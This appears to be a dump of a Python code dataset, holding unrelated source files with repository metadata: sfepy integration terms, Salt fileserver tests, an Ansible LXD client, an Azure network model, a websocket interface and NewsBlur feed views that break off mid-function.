| text | repo_name | path | language | license | size | score |
|---|---|---|---|---|---|---|
| stringlengths 6–947k | stringlengths 5–100 | stringlengths 4–231 | stringclasses (1 value) | stringclasses (15 values) | int64 6–947k | float64 0–0.34 |
import numpy as nm
from sfepy.base.base import assert_
from sfepy.linalg import dot_sequences
from sfepy.terms.terms import Term, terms
class IntegrateVolumeTerm(Term):
r"""
Evaluate (weighted) variable in a volume region.
Depending on evaluation mode, integrate a variable over a volume region
('eval'), average it in elements ('el_avg') or interpolate it into volume
quadrature points ('qp').
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega y \mbox{ , } \int_\Omega \ul{y} \\
\int_\Omega c y \mbox{ , } \int_\Omega c \ul{y}
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp} \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_volume_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
@staticmethod
def function(out, val_qp, vg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
else:
status = vg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return val_qp, vg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_c, 1), parameter.dtype
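def _example_ev_volume_integrate(problem):
    """
    Usage sketch (not part of the original module), assuming a sfepy
    Problem with a region 'Omega' and a scalar variable 'p': evaluate
    the term above in its three modes via Problem.evaluate().
    """
    total = problem.evaluate("ev_volume_integrate.2.Omega(p)", mode='eval')
    per_cell = problem.evaluate("ev_volume_integrate.2.Omega(p)", mode='el_avg')
    at_qp = problem.evaluate("ev_volume_integrate.2.Omega(p)", mode='qp')
    return total, per_cell, at_qp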
class IntegrateSurfaceTerm(Term):
r"""
Evaluate (weighted) variable in a surface region.
Depending on evaluation mode, integrate a variable over a surface region
('eval'), average it in element faces ('el_avg') or interpolate it into
surface quadrature points ('qp'). For vector variables, setting `term_mode`
to `'flux'` leads to computing corresponding fluxes for the three modes
instead.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Gamma y \mbox{ , } \int_\Gamma \ul{y}
\mbox{ , } \int_\Gamma \ul{y} \cdot \ul{n} \\
\int_\Gamma c y \mbox{ , } \int_\Gamma c \ul{y}
\mbox{ , } \int_\Gamma c \ul{y} \cdot \ul{n} \mbox{ flux }
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (\ul{y} \cdot \ul{n}) / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (c \ul{y} \cdot \ul{n}) / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp}
\mbox{ , } (\ul{y} \cdot \ul{n})|_{qp} \mbox{ flux } \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
\mbox{ , } (c \ul{y} \cdot \ul{n})|_{qp} \mbox{ flux }
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_surface_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
integration = 'surface'
@staticmethod
def function(out, val_qp, sg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
elif fmode == 5:
normal = sg.normal
out[:] = dot_sequences(val_qp, normal)
status = 0
else:
status = sg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
sg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
if term_mode == 'flux':
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if n_c == dim:
fmode += 3
return val_qp, sg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
if term_mode == 'flux':
n_c = 1
return (n_fa, n_qp, n_c, 1), parameter.dtype
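def _example_ev_surface_integrate_flux(problem):
    """
    Usage sketch (not part of the original module), assuming a surface
    region 'Gamma' and a vector variable 'u': total flux of u through
    Gamma, using term_mode='flux' as described above.
    """
    return problem.evaluate("ev_surface_integrate.2.Gamma(u)",
                            mode='eval', term_mode='flux')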
class IntegrateVolumeOperatorTerm(Term):
r"""
Volume integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_\Omega q \mbox{ or } \int_\Omega c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_volume_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
@staticmethod
def function(out, material, bf, geo):
bf_t = nm.tile(bf.transpose((0, 1, 3, 2)), (out.shape[0], 1, 1, 1))
bf_t = nm.ascontiguousarray(bf_t)
if material is not None:
status = geo.integrate(out, material * bf_t)
else:
status = geo.integrate(out, bf_t)
return status
def get_fargs(self, material, virtual,
mode=None, term_mode=None, diff_var=None, **kwargs):
assert_(virtual.n_components == 1)
geo, _ = self.get_mapping(virtual)
return material, geo.bf, geo
class IntegrateSurfaceOperatorTerm(IntegrateVolumeOperatorTerm):
r"""
Surface integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_{\Gamma} q \mbox{ or } \int_\Gamma c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_surface_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
integration = 'surface'
class VolumeTerm(Term):
r"""
Volume of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Omega 1
:Arguments:
- parameter : any variable
"""
name = 'd_volume'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
@staticmethod
def function(out, geo):
out[:] = geo.volume
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
return geo,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_cell, n_qp, dim, n_n, n_c = self.get_data_shape(parameter)
return (n_cell, 1, 1, 1), parameter.dtype
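def _example_d_volume(problem):
    """
    Usage sketch (not part of the original module): total volume of the
    (assumed) region 'Omega', using any variable 'p' defined on it for
    the reference mapping.
    """
    return problem.evaluate("d_volume.2.Omega(p)", mode='eval')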
class SurfaceTerm(VolumeTerm):
r"""
Surface of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Gamma 1
:Arguments:
- parameter : any variable
"""
name = 'd_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
class VolumeSurfaceTerm(Term):
r"""
Volume of a :math:`D`-dimensional domain, using a surface integral. Uses
approximation of the parameter variable.
:Definition:
.. math::
1 / D \int_\Gamma \ul{x} \cdot \ul{n}
:Arguments:
- parameter : any variable
"""
name = 'd_volume_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
function = staticmethod(terms.d_volume_surface)
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
ap, sg = self.get_approximation(parameter)
sd = ap.surface_data[self.region.name]
coor = parameter.field.get_coor()
return coor, sg, sd.econn.copy()
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
return (n_fa, 1, 1, 1), parameter.dtype
class SurfaceMomentTerm(Term):
r"""
Surface integral of the outer product of the unit outward normal
:math:`\ul{n}` and the coordinate :math:`\ul{x}` shifted by :math:`\ul{x}_0`
:Definition:
.. math::
\int_{\Gamma} \ul{n} (\ul{x} - \ul{x}_0)
:Arguments:
- parameter : any variable
- shift : :math:`\ul{x}_0`
"""
name = 'di_surface_moment'
arg_types = ('parameter', 'shift')
integration = 'surface'
function = staticmethod(terms.di_surface_moment)
def get_fargs(self, parameter, shift,
mode=None, term_mode=None, diff_var=None, **kwargs):
ap, sg = self.get_approximation(parameter)
sd = ap.surface_data[self.region.name]
coor = parameter.field.get_coor() \
- nm.asarray(shift, dtype=nm.float64)[None,:]
return coor, sg, sd.econn.copy()
def get_eval_shape(self, parameter, shift,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
return (n_fa, 1, dim, dim), parameter.dtype
class IntegrateMatTerm(Term):
r"""
Evaluate material parameter :math:`m` in a volume/surface region.
Depending on evaluation mode, integrate a material parameter over a
volume/surface region ('eval'), average it in elements/faces ('el_avg') or
interpolate it into volume/surface quadrature points ('qp').
Uses reference mapping of :math:`y` variable.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega m
.. math::
\mbox{vector for } K \from \Ical_h: \int_{T_K} m / \int_{T_K} 1
.. math::
m|_{qp}
:Arguments:
- material : :math:`m` (can have up to two dimensions)
- parameter : :math:`y`
"""
name = 'ev_integrate_mat'
arg_types = ('material', 'parameter')
arg_shapes = [{'material' : '1, 1', 'parameter' : 1},
{'material' : 'D, D'},
{'material' : 'S, S'},
{'material' : 'D, S'}]
@staticmethod
def function(out, mat, geo, fmode):
if fmode == 2:
out[:] = mat
status = 0
else:
status = geo.integrate(out, mat, fmode)
return status
def get_fargs(self, mat, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return mat, geo, fmode
def get_eval_shape(self, mat, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
n_row, n_col = mat.shape[-2:]
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_row, n_col), mat.dtype
class SumNodalValuesTerm(Term):
r"""
Sum nodal values.
:Arguments:
- parameter : :math:`p` or :math:`\ul{u}`
"""
name = 'd_sum_vals'
arg_types = ('parameter',)
arg_shapes = [{'parameter' : 1}, {'parameter' : 'D'}]
@staticmethod
def function(out, vec):
out[:] = nm.sum(vec, 0)
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vec = parameter.get_state_in_region(self.region)
return vec,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
return (n_el, n_c), parameter.dtype
| RexFuzzle/sfepy | sfepy/terms/terms_basic.py | Python | bsd-3-clause | 12,864 | 0.003887 |
"""
:codeauthor: Joao Mesquita <jmesquita@sangoma.com>
"""
import datetime
import os
import time
import salt.utils.files
from salt import fileserver
from tests.support.helpers import with_tempdir
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
class MapDiffTestCase(TestCase):
    def test_diff_with_different_keys(self):
        """
        Test that maps with different keys are reported as different
        """
        map1 = {"file1": 1234}
        map2 = {"file2": 1234}
        assert fileserver.diff_mtime_map(map1, map2) is True
    def test_diff_with_different_values(self):
        """
        Test that maps with different mtime values are reported as different
        """
        map1 = {"file1": 12345}
        map2 = {"file1": 1234}
        assert fileserver.diff_mtime_map(map1, map2) is True
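    # Complementary case sketch (not in the original tests), assuming
    # diff_mtime_map reports identical maps as unchanged.
    def test_no_diff_with_identical_maps(self):
        """
        Test that identical maps are not reported as different
        """
        map1 = {"file1": 1234}
        map2 = {"file1": 1234}
        assert fileserver.diff_mtime_map(map1, map2) is False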
class VCSBackendWhitelistCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {fileserver: {}}
def test_whitelist(self):
opts = {
"fileserver_backend": ["roots", "git", "s3fs", "hgfs", "svn"],
"extension_modules": "",
}
fs = fileserver.Fileserver(opts)
assert sorted(fs.servers.whitelist) == sorted(
["git", "gitfs", "hg", "hgfs", "svn", "svnfs", "roots", "s3fs"]
), fs.servers.whitelist
@with_tempdir()
def test_future_file_list_cache_file_ignored(self, cachedir):
opts = {
"fileserver_backend": ["roots"],
"cachedir": cachedir,
"extension_modules": "",
}
back_cachedir = os.path.join(cachedir, "file_lists/roots")
os.makedirs(os.path.join(back_cachedir))
# Touch a couple files
for filename in ("base.p", "foo.txt"):
with salt.utils.files.fopen(
os.path.join(back_cachedir, filename), "wb"
) as _f:
if filename == "base.p":
_f.write(b"\x80")
# Set modification time to file list cache file to 1 year in the future
now = datetime.datetime.utcnow()
future = now + datetime.timedelta(days=365)
mod_time = time.mktime(future.timetuple())
os.utime(os.path.join(back_cachedir, "base.p"), (mod_time, mod_time))
list_cache = os.path.join(back_cachedir, "base.p")
w_lock = os.path.join(back_cachedir, ".base.w")
ret = fileserver.check_file_list_cache(opts, "files", list_cache, w_lock)
        assert (
            ret[1] is True
        ), "File list cache file is not refreshed when its modification time is in the future"
| saltstack/salt | tests/unit/test_fileserver.py | Python | apache-2.0 | 2,610 | 0.000766 |
class Solution:
"""
@param s: The first string
@param b: The second string
@return true or false
"""
# Time: is equal to sorted O(nlogn)
# Space: O(1)
def anagram(self, s, t):
# write your code here
s = sorted(s)
t = sorted(t)
return s == t
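    # Alternative sketch (not part of the original solution): an O(n)
    # counting approach that avoids sorting; uses extra space for the
    # per-character counts.
    def anagram_counting(self, s, t):
        from collections import Counter
        return Counter(s) == Counter(t)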
| rosegun38/LintCode | Two_Strings_Are_Anagrams/Solution.py | Python | gpl-3.0 | 307 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = """alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT 'order-placement fingerprint';"""
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))
| yaolei313/python-study | base/test.py | Python | gpl-2.0 | 365 | 0.00554 |
import sublime
HOST_PLATFORM = sublime.platform()
WINDOWS = 'windows'
LINUX = 'linux'
OSX = 'osx'
| SublimeText/VintageEx | plat/__init__.py | Python | mit | 109 | 0 |
# -*- coding: utf-8 -*-
# (c) 2016, Hiroaki Nakamura <hnakamur@gmail.com>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import json
except ImportError:
import simplejson as json
# httplib/http.client connection using unix domain socket
import socket
import ssl
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
# Python 3
from http.client import HTTPConnection, HTTPSConnection
class UnixHTTPConnection(HTTPConnection):
def __init__(self, path):
HTTPConnection.__init__(self, 'localhost')
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
from ansible.module_utils.urls import generic_urlparse
try:
from urlparse import urlparse
except ImportError:
# Python 3
    from urllib.parse import urlparse
class LXDClientException(Exception):
def __init__(self, msg, **kwargs):
self.msg = msg
self.kwargs = kwargs
class LXDClient(object):
def __init__(self, url, key_file=None, cert_file=None, debug=False):
"""LXD Client.
:param url: The URL of the LXD server. (e.g. unix:/var/lib/lxd/unix.socket or https://127.0.0.1)
:type url: ``str``
:param key_file: The path of the client certificate key file.
:type key_file: ``str``
:param cert_file: The path of the client certificate file.
:type cert_file: ``str``
:param debug: The debug flag. The request and response are stored in logs when debug is true.
:type debug: ``bool``
"""
self.url = url
self.debug = debug
self.logs = []
if url.startswith('https:'):
self.cert_file = cert_file
self.key_file = key_file
parts = generic_urlparse(urlparse(self.url))
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(cert_file, keyfile=key_file)
self.connection = HTTPSConnection(parts.get('netloc'), context=ctx)
elif url.startswith('unix:'):
unix_socket_path = url[len('unix:'):]
self.connection = UnixHTTPConnection(unix_socket_path)
else:
raise LXDClientException('URL scheme must be unix: or https:')
def do(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
resp_json = self._send_request(method, url, body_json=body_json, ok_error_codes=ok_error_codes, timeout=timeout)
if resp_json['type'] == 'async':
url = '{0}/wait'.format(resp_json['operation'])
resp_json = self._send_request('GET', url)
if resp_json['metadata']['status'] != 'Success':
self._raise_err_from_json(resp_json)
return resp_json
def authenticate(self, trust_password):
body_json = {'type': 'client', 'password': trust_password}
return self._send_request('POST', '/1.0/certificates', body_json=body_json)
def _send_request(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
try:
body = json.dumps(body_json)
self.connection.request(method, url, body=body)
resp = self.connection.getresponse()
resp_json = json.loads(resp.read())
self.logs.append({
'type': 'sent request',
'request': {'method': method, 'url': url, 'json': body_json, 'timeout': timeout},
'response': {'json': resp_json}
})
resp_type = resp_json.get('type', None)
if resp_type == 'error':
if ok_error_codes is not None and resp_json['error_code'] in ok_error_codes:
return resp_json
if resp_json['error'] == "Certificate already in trust store":
return resp_json
self._raise_err_from_json(resp_json)
return resp_json
except socket.error as e:
raise LXDClientException('cannot connect to the LXD server', err=e)
def _raise_err_from_json(self, resp_json):
err_params = {}
if self.debug:
err_params['logs'] = self.logs
raise LXDClientException(self._get_err_from_resp_json(resp_json), **err_params)
@staticmethod
def _get_err_from_resp_json(resp_json):
err = None
metadata = resp_json.get('metadata', None)
if metadata is not None:
err = metadata.get('err', None)
if err is None:
err = resp_json.get('error', None)
return err
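def example_lxd_client_usage():
    """
    Usage sketch (not part of the original module): list containers over
    the local unix socket. The socket path is the LXD default and is an
    assumption; adjust it for your installation.
    """
    client = LXDClient('unix:/var/lib/lxd/unix.socket')
    resp = client.do('GET', '/1.0/containers')
    return resp['metadata']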
| camradal/ansible | lib/ansible/module_utils/lxd.py | Python | gpl-3.0 | 6,180 | 0.004045 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import os
import math as m
import numpy as np
def Gaus(v,mu,sigma):
"Gaussian distribution"
return np.exp(-0.5*((v-mu)/sigma)**2)/(sigma*m.sqrt(2*m.pi))
mu = 0.5
sigma = 1.5
print "reading file..."
gausFile = open("gausRandom.out", 'r')
gausNums = map(float, gausFile.read().split())
gausFile.close()
gausBins = np.linspace(mu - 5*sigma, mu + 5*sigma)
# Evaluate the reference PDF at the bin centers (the original shifted the
# points one full bin width to the left of the bin edges).
gausPoints = gausBins[:-1] + 0.5*np.diff(gausBins)
plt.hist(gausNums, bins=gausBins, normed=True)
plt.plot(gausPoints, Gaus(gausPoints, mu, sigma))
plt.show()
| htimko/ArcPIC | pic2d/tests/rngtestAna.py | Python | gpl-3.0 | 571 | 0.019264 |
from pivoteer import *
from pivotEngine import *
from pivotUtils import *
| BechtelCIRT/pivoteer | pivoteer/__init__.py | Python | mit | 74 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayBackendAddressPool(SubResource):
"""Backend Address Pool of an application gateway.
:param id: Resource ID.
:type id: str
:param backend_ip_configurations: Collection of references to IPs defined
in network interfaces.
:type backend_ip_configurations:
list[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration]
:param backend_addresses: Backend addresses
:type backend_addresses:
list[~azure.mgmt.network.v2018_01_01.models.ApplicationGatewayBackendAddress]
:param provisioning_state: Provisioning state of the backend address pool
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Resource that is unique within a resource group. This name
can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'backend_ip_configurations': {'key': 'properties.backendIPConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'backend_addresses': {'key': 'properties.backendAddresses', 'type': '[ApplicationGatewayBackendAddress]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayBackendAddressPool, self).__init__(**kwargs)
self.backend_ip_configurations = kwargs.get('backend_ip_configurations', None)
self.backend_addresses = kwargs.get('backend_addresses', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
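def _example_backend_pool():
    # Construction sketch (not part of the original module): the generated
    # constructor simply stores keyword arguments; the pool name and the
    # address below are placeholder values.
    return ApplicationGatewayBackendAddressPool(
        name='appGatewayBackendPool',
        backend_addresses=[{'ip_address': '10.0.0.4'}],
    )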
| lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_backend_address_pool.py | Python | mit | 2,589 | 0.001545 |
#
# mjmud - The neverending MUD project
#
# Copyright (c) 2014, Matt Jordan
#
# See https://github.com/matt-jordan/mjmud for more information about the
# project. Please do not contact the maintainers of the project for information
# or assistance. The project uses Github for these purposes.
#
# This program is free software, distributed under the conditions of the MIT
# License (MIT). See the LICENSE file at the top of the source tree for
# details.
from zope.interface import Interface
class IWebSocketReceiver(Interface):
def on_message_received(protocol, json_msg):
"""Receive and process a JSON message
Keyword Arguments:
protocol -- the websocket protocol that received the JSON message
json_msg -- the JSON object received from the protocol's peer
"""
def on_connected(protocol, peer):
"""Called when a connection is established
Keyword Arguments:
protocol -- the websocket protocol that is serving the peer
peer -- the peer that connected
"""
def on_closed(protocol, was_clean, code, reason):
"""Called when a connection is closed
Keyword Arguments:
protocol -- the websocket protocol that disconnected
was_clean -- true if the handshake occurred; false otherwise
code -- numeric code describing the disconnection
reason -- why the disconnection occurred
"""
class IWebSocketClientReceiver(Interface):
def on_connection_failed(protocol, connector, reason):
"""Called when a client connection fails
Keyword Arguments:
protocol -- the websocket client protocol that failed
connector -- the connection object
reason -- why the connection failed
"""
class ReceiverError(Exception):
"""An exception occurred in a protocol receiver"""
pass
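# Implementation sketch (not part of the original module): a minimal class
# declaring that it provides IWebSocketReceiver; the print bodies are
# placeholders.
from zope.interface import implementer
@implementer(IWebSocketReceiver)
class PrintingReceiver(object):
    def on_message_received(self, protocol, json_msg):
        print(json_msg)
    def on_connected(self, protocol, peer):
        print('connected: {0}'.format(peer))
    def on_closed(self, protocol, was_clean, code, reason):
        print('closed ({0}): {1}'.format(code, reason))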
| matt-jordan/mjmud | lib/transports/ws_receiver.py | Python | mit | 1,886 | 0 |
import datetime
from urlparse import urlparse
from utils import log as logging
from django.shortcuts import get_object_or_404, render_to_response
from django.views.decorators.http import condition
from django.http import HttpResponseForbidden, HttpResponseRedirect, HttpResponse, Http404
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
# from django.db import IntegrityError
from apps.rss_feeds.models import Feed, merge_feeds
from apps.rss_feeds.models import MFetchHistory
from apps.rss_feeds.models import MFeedIcon
from apps.push.models import PushSubscription
from apps.analyzer.models import get_classifiers_for_user
from apps.reader.models import UserSubscription
from apps.rss_feeds.models import MStory
from utils.user_functions import ajax_login_required
from utils import json_functions as json, feedfinder2 as feedfinder
from utils.feed_functions import relative_timeuntil, relative_timesince
from utils.user_functions import get_user
from utils.view_functions import get_argument_or_404
from utils.view_functions import required_params
from utils.view_functions import is_true
from vendor.timezones.utilities import localtime_for_timezone
from utils.ratelimit import ratelimit
IGNORE_AUTOCOMPLETE = [
"facebook.com/feeds/notifications.php",
"inbox",
"secret",
"password",
"latitude",
]
@ajax_login_required
@json.json_view
def search_feed(request):
address = request.REQUEST.get('address')
offset = int(request.REQUEST.get('offset', 0))
if not address:
return dict(code=-1, message="Please provide a URL/address.")
logging.user(request.user, "~FBFinding feed (search_feed): %s" % address)
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META['REMOTE_ADDR']
logging.user(request.user, "~FBIP: %s" % ip)
aggressive = request.user.is_authenticated()
feed = Feed.get_feed_from_url(address, create=False, aggressive=aggressive, offset=offset)
if feed:
return feed.canonical()
else:
return dict(code=-1, message="No feed found matching that XML or website address.")
@json.json_view
def load_single_feed(request, feed_id):
user = get_user(request)
feed = get_object_or_404(Feed, pk=feed_id)
classifiers = get_classifiers_for_user(user, feed_id=feed.pk)
payload = feed.canonical(full=True)
payload['classifiers'] = classifiers
return payload
def feed_favicon_etag(request, feed_id):
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
return
return feed_icon.color
@condition(etag_func=feed_favicon_etag)
def load_feed_favicon(request, feed_id):
not_found = False
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
not_found = True
if not_found or not feed_icon.data:
return HttpResponseRedirect(settings.MEDIA_URL + 'img/icons/circular/world.png')
icon_data = feed_icon.data.decode('base64')
return HttpResponse(icon_data, mimetype='image/png')
@json.json_view
def feed_autocomplete(request):
query = request.GET.get('term') or request.GET.get('query')
version = int(request.GET.get('v', 1))
format = request.GET.get('format', 'autocomplete')
# user = get_user(request)
# if True or not user.profile.is_premium:
# return dict(code=-1, message="Overloaded, no autocomplete results.", feeds=[], term=query)
if not query:
return dict(code=-1, message="Specify a search 'term'.", feeds=[], term=query)
if '.' in query:
try:
parts = urlparse(query)
if not parts.hostname and not query.startswith('http'):
parts = urlparse('http://%s' % query)
if parts.hostname:
query = [parts.hostname]
query.extend([p for p in parts.path.split('/') if p])
query = ' '.join(query)
except:
logging.user(request, "~FGAdd search, could not parse url in ~FR%s" % query)
query_params = query.split(' ')
tries_left = 5
while len(query_params) and tries_left:
tries_left -= 1
feed_ids = Feed.autocomplete(' '.join(query_params))
if feed_ids:
break
else:
query_params = query_params[:-1]
feeds = list(set([Feed.get_by_id(feed_id) for feed_id in feed_ids]))
feeds = [feed for feed in feeds if feed and not feed.branch_from_feed]
feeds = [feed for feed in feeds if all([x not in feed.feed_address for x in IGNORE_AUTOCOMPLETE])]
if format == 'autocomplete':
feeds = [{
'id': feed.pk,
'value': feed.feed_address,
'label': feed.feed_title,
'tagline': feed.data and feed.data.feed_tagline,
'num_subscribers': feed.num_subscribers,
} for feed in feeds]
else:
feeds = [feed.canonical(full=True) for feed in feeds]
feeds = sorted(feeds, key=lambda f: -1 * f['num_subscribers'])
feed_ids = [f['id'] for f in feeds]
feed_icons = dict((icon.feed_id, icon) for icon in MFeedIcon.objects.filter(feed_id__in=feed_ids))
for feed in feeds:
if feed['id'] in feed_icons:
feed_icon = feed_icons[feed['id']]
if feed_icon.data:
feed['favicon_color'] = feed_icon.color
feed['favicon'] = feed_icon.data
logging.user(request, "~FGAdd Search: ~SB%s ~SN(%s matches)" % (query, len(feeds),))
if version > 1:
return {
'feeds': feeds,
